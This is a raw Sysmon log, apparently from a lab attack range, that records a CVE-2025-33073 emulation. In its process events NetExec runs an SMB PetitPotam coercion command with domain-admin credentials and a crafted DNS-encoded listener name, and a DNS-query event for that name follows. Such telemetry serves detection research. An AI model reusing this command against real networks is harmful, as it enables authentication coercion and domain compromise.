154100x80000000000000001805370Microsoft-Windows-Sysmon/OperationalWIN10-21H1.attackrange.local -2025-11-12 15:05:38.480F51F9151-A242-6914-E807-000000002F0010496C:\Users\localuser\CVE-2025-33073\nxc.exe-----nxc.exe smb 10.3.10.6 -d snapattack -u domainadmin -p "P@ssw0rd1" -M coerce_plus -o M=PetitPotam L="DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"C:\Users\localuser\CVE-2025-33073\WIN10-21H1\localuserF51F9151-9B81-6914-7AEA-1600000000000x16ea7a2HighMD5=8E024A4C90F17F1AEDC7FC53D5CA23C6,SHA256=8C378F6200EEC750ED66BDE1E54C29B7BD172E503A5874CA2EEAD4705DD7B515,IMPHASH=33742414196E45B8B306A928E178F844F51F9151-A240-6914-E707-000000002F009908C:\Users\localuser\CVE-2025-33073\nxc.exenxc.exe smb 10.3.10.6 -d snapattack -u domainadmin -p "password" -M coerce_plus -o M=PetitPotam L="DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"WIN10-21H1\localuser 22542200x80000000000000001803775Microsoft-Windows-Sysmon/OperationalWIN10-21H1.attackrange.local -2025-11-12 15:05:30.979F51F9151-A238-6914-DD07-000000002F0010096DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.attackrange.local0::ffff:10.3.10.8;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWIN10-21H1\localuser